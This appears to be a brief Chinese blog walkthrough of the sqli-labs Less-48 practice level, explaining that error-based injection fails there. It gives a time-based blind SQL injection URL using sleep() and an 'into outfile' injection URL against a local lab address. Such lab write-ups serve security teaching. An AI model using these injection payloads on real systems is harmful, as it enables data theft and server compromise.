sqli-labs————Less-48

FLy_鵬程萬里發表於2018-05-21

Less-48


本關與less-46的區別在於報錯注入不能使用,不進行錯誤回顯,其他的方法我們依舊是可以使用的。

可以利用sort=rand(true/false)進行判斷。



and延時注入

http://192.168.11.136/sqli-labs/Less-48?sort=1 and (if (ascii(substr(database(),1,1))=115,0,sleep(5)))



同時,我們照樣可以進行into outfile注入:

http://192.168.11.136/sqli-labs/Less-48?sort=1  into outfile "路徑"

這裡就不進行貼圖演示了。



相關文章